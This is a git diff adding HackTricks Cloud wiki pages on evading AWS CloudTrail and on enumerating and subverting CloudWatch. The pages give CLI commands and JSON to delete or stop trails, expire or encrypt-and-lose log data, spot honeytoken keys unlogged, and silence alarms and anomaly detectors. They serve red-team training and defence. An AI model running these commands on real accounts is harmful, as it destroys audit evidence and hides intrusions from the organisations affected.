+    z = int.from_bytes(y, byteorder='big', signed=False)
+    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
+    
+    e = (z & mask)>>7
+    return (e)
+
+print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
+```
+
+Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489).
+
+#### Do not generate a log
+
+The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**.
+
+The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**.
+
+#### AWS services without logs
+
+In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it.
+
+This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken.
+
+![](<../../../../.gitbook/assets/image (93).png>)
+
+{% hint style="danger" %}
+Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own...
+
+For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).
+{% endhint %}
+
+### Accessing Third Infrastructure
+
+Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication.
+
+Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**.
+
+More info in:
+
+{% content-ref url="../../aws-post-exploitation/aws-eks-post-exploitation.md" %}
+[aws-eks-post-exploitation.md](../../aws-post-exploitation/aws-eks-post-exploitation.md)
+{% endcontent-ref %}
+
+### Modifying CloudTrail Config
+
+#### Delete trails
+
+```bash
+aws cloudtrail delete-trail --name [trail-name]
+```
+
+#### Stop trails
+
+```bash
+aws cloudtrail stop-logging --name [trail-name]
+```
+
+#### Disable multi-region logging
+
+{% code overflow="wrap" %}
+```bash
+aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services
+```
+{% endcode %}
+
+#### Disable Logging by Event Selectors
+
+{% code overflow="wrap" %}
+```bash
+# Leave only the ReadOnly selector
+aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>
+
+# Remove all selectors (stop Insights)
+aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>
+```
+{% endcode %}
+
+In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example).
+
+You can customize the event selector based on your specific requirements.
+
+#### Logs deletion via S3 lifecycle policy
+
+{% code overflow="wrap" %}
+```bash
+aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>
+```
+{% endcode %}
+
+### Modifying Bucket Configuration
+
+* Delete the S3 bucket
+* Change bucket policy to deny any writes from the CloudTrail service
+* Add lifecycle policy to S3 bucket to delete objects
+* Disable the kms key used to encrypt the CloudTrail logs
+
+### Cloudtrail ransomware
+
+#### S3 ransomware
+
+You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\
+This is basically a **S3-KMS ransomware** explained in:
+
+{% content-ref url="../../aws-post-exploitation/aws-s3-post-exploitation.md" %}
+[aws-s3-post-exploitation.md](../../aws-post-exploitation/aws-s3-post-exploitation.md)
+{% endcontent-ref %}
+
+**KMS ransomware**
+
+This is an easiest way to perform the previous attack with different permissions requirements:
+
+{% content-ref url="../../aws-post-exploitation/aws-kms-post-exploitation.md" %}
+[aws-kms-post-exploitation.md](../../aws-post-exploitation/aws-kms-post-exploitation.md)
+{% endcontent-ref %}
+
+## **References**
+
+* [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
new file mode 100644
index 0000000000..69b0af8071
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
@@ -0,0 +1,479 @@
+# AWS - CloudWatch Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## CloudWatch
+
+**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\
+CloudWatch Log Event have a **size limitation of 256KB on each log line**.\
+It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications.
+
+You can monitor for example logs from CloudTrail. Events that are monitored:
+
+* Changes to Security Groups and NACLs
+* Starting, Stopping, rebooting and terminating EC2 instances
+* Changes to Security Policies within IAM and S3
+* Failed login attempts to the AWS Management Console
+* API calls that resulted in failed authorization
+* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
+
+## Key concepts
+
+### Namespaces
+
+A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them.
+
+* **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics.
+
+### Metrics
+
+Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations.
+
+* **Example**: CPUUtilization, NetworkIn, DiskReadOps.
+
+### Dimensions
+
+Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes.
+
+* **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone.
+
+### Statistics
+
+Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount.
+
+* **Example**: Calculating the average CPU utilization over a period of one hour.
+
+### Units
+
+Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count.
+
+* **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes.
+
+## CloudWatch Features
+
+### Dashboard
+
+**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services.
+
+**Key Features**:
+
+* **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more.
+* **Customization**: Layout and content can be customized to fit specific monitoring needs.
+
+**Example Use Case**:
+
+* A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets.
+
+### Metric Stream and Metric Data
+
+**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS.
+
+**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources.
+
+**Example Use Case**:
+
+* Sending real-time metrics to a third-party monitoring service for advanced analysis.
+* Archiving metrics in an Amazon S3 bucket for long-term storage and compliance.
+
+### Alarm
+
+**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function.
+
+**Key Components**:
+
+* **Threshold**: The value at which the alarm triggers.
+* **Evaluation Periods**: The number of periods over which data is evaluated.
+* **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm
+* **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS).
+
+**Example Use Case**:
+
+* Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes.
+
+### Anomaly Detectors
+
+**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues.
+
+**Key Components**:
+
+* **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like.
+* **Anomaly Detection Band**: A visual representation of the expected range of values for a metric.
+
+**Example Use Case**:
+
+* Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue.
+
+### Insight Rules and Managed Insight Rules
+
+**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization.
+
+**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration.
+
+**Example Use Case**:
+
+* Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action.
+
+### CloudWatch Logs <a href="#cloudwatch-logs" id="cloudwatch-logs"></a>
+
+Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported.
+
+**Elements**:
+
+| **Log Group**            | A **collection of log streams** that share the same retention, monitoring, and access control settings                                                     |
+| ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| **Log Stream**           | A sequence of **log events** that share the **same source**                                                                                                |
+| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function |
+
+### CloudWatch Monitoring & Events
+
+CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\
+In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams)
+
+### Agent Installation
+
+You can install agents inside your machines/containers to automatically send the logs back to CloudWatch.
+
+* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
+* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
+* **Configure** and **start** the CloudWatch Agent
+
+A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
+
+## Enumeration
+
+```bash
+# Dashboards #
+
+## Returns a list of the dashboards of your account
+aws cloudwatch list-dashboards
+
+## Retrieves the details of the specified dashboard
+aws cloudwatch get-dashboard --dashboard-name <value>
+
+# Metrics #
+
+## Returns a list of the specified metric
+aws cloudwatch list-metrics [--namespace <value>] [--metric-name <value>] [--dimensions <value>] [--include-linked-accounts | --no-include-linked-accounts]
+
+## Retrieves metric data (this operation can include a CloudWatch Metrics Insights query, and one or more metric math functions)
+aws cloudwatch get-metric-data --metric-data-queries <value> --start-time <value> --end-time <value>
+
+## Retrieves statistics for the specified metric and namespace over a range of time
+aws cloudwatch get-metric-statistics --namespace <value> --metric-name <value> [--dimensions <value>] --start-time <value> --end-time <value> --period <value>
+
+## Returns a list of the metric streams of your account
+aws cloudwatch list-metric-streams 
+
+## Retrieves information about the specified metric stream
+aws cloudwatch get-metric-stream --name <value>
+
+## Retrieve snapshots of the specified metric widgets
+aws cloudwatch get-metric-widget-image --metric-widget <value>
+
+# Alarms #
+
+## Retrieves the specified alarm
+aws cloudwatch describe-alarms [--alarm-names <value>] [--alarm-name-prefix <value>] [--alarm-types <value>] [--state-value <value>]
+
+## Retrieves the alarms history, even for deleted alarms
+aws cloudwatch describe-alarm-history [--alarm-name <value>] [--alarm-types <value>] [--history-item-type <ConfigurationUpdate | StateUpdate | Action>] [--start-date <value>] [--end-date <value>]
+
+## Retrieves standard alarms based on the specified metric
+aws cloudwatch escribe-alarms-for-metric --metric-name <value> --namespace <value> [--dimensions <value>]
+
+# Anomaly Detections #
+
+## Lists the anomaly detection models that you have created in your account
+aws cloudwatch describe-anomaly-detectors [--namespace <value>] [--metric-name <value>] [--dimensions <value>]
+
+## Lists all the Contributor Insight rules in your account
+aws cloudwatch describe-insight-rules
+
+## Retrieves the data collected over a time range for a given Contributor Insight rule	
+aws cloudwatch get-insight-rule-report --rule-name <value> --start-time <value> --end-time <value> --period <value>
+
+## Lists managed Contributor Insights rules in your account for a specified resource
+aws cloudwatch list-managed-insight-rules --resource-arn <value>
+
+# Tags #
+
+## Lists the tags associated with the specified CloudWatch resources
+aws cloudwatch list-tags-for-resource --resource-arn <value>
+
+# CloudWatch Logs #
+aws logs tail "<log_group_name>" --followaws logs get-log-events --log-group-name "<log_group_name>" --log-stream-name "<log_stream_name>" --output text > <output_file>
+
+# CloudWatch Events #
+aws events list-rules
+aws events describe-rule --name <name>aws events list-targets-by-rule --rule <name>aws events list-archives
+aws events describe-archive --archive-name <name>aws events list-connections
+aws events describe-connection --name <name>aws events list-endpoints
+aws events describe-endpoint --name <name>aws events list-event-sources
+aws events describe-event-source --name <name>aws events list-replays
+aws events list-api-destinations
+aws events list-event-buses
+```
+
+## Post-Exploitation / Bypass
+
+### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`**
+
+An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents.
+
+In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete.
+
+```bash
+aws cloudwatch put-metric-alarm --cli-input-json <value> | --alarm-name <value> --comparison-operator <value> --evaluation-periods <value> [--datapoints-to-alarm <value>] [--threshold <value>] [--alarm-description <value>] [--alarm-actions <value>] [--metric-name <value>] [--namespace <value>] [--statistic <value>] [--dimensions <value>] [--period <value>]
+aws cloudwatch delete-alarms --alarm-names <value>
+aws cloudwatch put-composite-alarm --alarm-name <value> --alarm-rule <value> [--no-actions-enabled | --actions-enabled [--alarm-actions <value>] [--insufficient-data-actions <value>] [--ok-actions <value>] ]
+```
+
+The following example shows how to make a metric alarm ineffective:
+
+* This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic.
+* By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm.
+
+{% tabs %}
+{% tab title="Original Metric Alarm" %}
+```json
+{
+  "Namespace": "AWS/EC2",
+  "MetricName": "CPUUtilization",
+  "Dimensions": [
+    {
+      "Name": "InstanceId",
+      "Value": "i-01234567890123456"
+    }
+  ],
+  "AlarmActions": [
+    "arn:aws:sns:us-east-1:123456789012:example_sns"
+  ],
+  "ComparisonOperator": "GreaterThanThreshold",
+  "DatapointsToAlarm": 4,
+  "EvaluationPeriods": 6,
+  "Period": 300,
+  "Statistic": "Average",
+  "Threshold": 60,
+  "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%",
+  "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization"
+}
+```
+{% endtab %}
+
+{% tab title="Modified Metric Alarm" %}
+```json
+{
+  "Namespace": "AWS/EC2",
+  "MetricName": "CPUUtilization",
+  "Dimensions": [
+    {
+      "Name": "InstanceId",
+      "Value": "i-0645d6d414dadf9f8"
+    }
+  ],
+  "AlarmActions": [],
+  "ComparisonOperator": "GreaterThanThreshold",
+  "DatapointsToAlarm": 8640,
+  "EvaluationPeriods": 8640,
+  "Period": 10,
+  "Statistic": "Average",
+  "Threshold": 99,
+  "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold",
+  "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization"
+}
+
+```
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+
+### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`**
+
+By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response.
+
+In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures.
+
+* If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration.
+
+```bash
+aws cloudwatch disable-alarm-actions --alarm-names <value>
+aws cloudwatch enable-alarm-actions --alarm-names <value>
+aws cloudwatch set-alarm-state --alarm-name <value> --state-value <OK | ALARM | INSUFFICIENT_DATA> --state-reason <value> [--state-reason-data <value>]
+```
+
+**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+
+### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`**
+
+An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring.
+
+```bash
+aws cloudwatch delete-anomaly-detector [--cli-input-json <value> | --namespace <value> --metric-name <value> --dimensions <value> --stat <value>]
+aws cloudwatch put-anomaly-detector [--cli-input-json <value> | --namespace <value> --metric-name <value> --dimensions <value> --stat <value> --configuration <value> --metric-characteristics <value>]
+```
+
+The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period.
+
+{% tabs %}
+{% tab title="Original Metric Anomaly Detector" %}
+```json
+{
+    "SingleMetricAnomalyDetector": {
+        "Namespace": "AWS/EC2",
+        "MetricName": "CPUUtilization",
+        "Stat": "Average",
+        "Dimensions": [
+            {
+                "Name": "InstanceId",
+                "Value": "i-0123456789abcdefg"
+            }
+        ]
+    }
+}
+```
+{% endtab %}
+
+{% tab title="Modified Metric Anomaly Detector" %}
+```json
+{
+    "SingleMetricAnomalyDetector": {
+        "Namespace": "AWS/EC2",
+        "MetricName": "CPUUtilization",
+        "Stat": "Average",
+        "Dimensions": [
+            {
+                "Name": "InstanceId",
+                "Value": "i-0123456789abcdefg"
+            }
+        ]
+    },
+    "Configuration": {
+        "ExcludedTimeRanges": [
+            {
+                "StartTime": "2023-01-01T00:00:00Z",
+                "EndTime": "2053-01-01T23:59:59Z"
+            }
+        ],
+        "Timezone": "Europe/Madrid"
+    }
+}
+```
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact**: Direct effect in the detection of unusual patterns or security threats.
+
+### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`**
+
+An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities.
+
+```bash
+aws cloudwatch delete-dashboards --dashboard-names <value>
+aws cloudwatch put-dashboard --dashboard-name <value> --dashboard-body <value>
+```
+
+**Potential Impact**: Loss of monitoring visibility and misleading information.
+
+### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`**
+
+Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team.
+
+```bash
+aws cloudwatch delete-insight-rules --rule-names <value>
+aws cloudwatch put-insight-rule --rule-name <value> --rule-definition <value> [--rule-state <value>]
+aws cloudwatch put-managed-insight-rules --managed-rules <value>
+```
+
+**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures.
+
+### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`**
+
+By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity.
+
+```bash
+aws cloudwatch disable-insight-rules --rule-names <value>
+aws cloudwatch enable-insight-rules --rule-names <value>
+```
+
+**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts.
+
+### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`**
+
+An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity:
+
+* **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations.
+* **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues.
+* **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden.
+
+Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless.
+
+```bash
+aws cloudwatch delete-metric-stream --name <value>
+aws cloudwatch put-metric-stream --name <value> [--include-filters <value>] [--exclude-filters <value>] --firehose-arn <value> --role-arn <value> --output-format <value>
+aws cloudwatch put-metric-data --namespace <value> [--metric-data <value>] [--metric-name <value>] [--timestamp <value>] [--unit <value>] [--value <value>] [--dimensions <value>]
+```
+
+Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance:
+
+```bash
+aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg"
+```
+
+**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams.
+
+### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`**
+
+An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams.
+
+```bash
+aws cloudwatch stop-metric-streams --names <value>
+aws cloudwatch start-metric-streams --names <value>
+```
+
+**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents.
+
+### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`**
+
+An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags.
+
+```bash
+aws cloudwatch tag-resource --resource-arn <value> --tags <value>
+aws cloudwatch untag-resource --resource-arn <value> --tag-keys <value>
+```
+
+**Potential Impact**: Disruption of tag-based access control policies.
+
+## References
+
+* [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info)
+* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html)
+* [https://docs.aws.amazon.com/es\_es/AmazonCloudWatch/latest/monitoring/cloudwatch\_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
new file mode 100644
index 0000000000..3736b5511d
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
@@ -0,0 +1,72 @@
+# AWS - Config Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
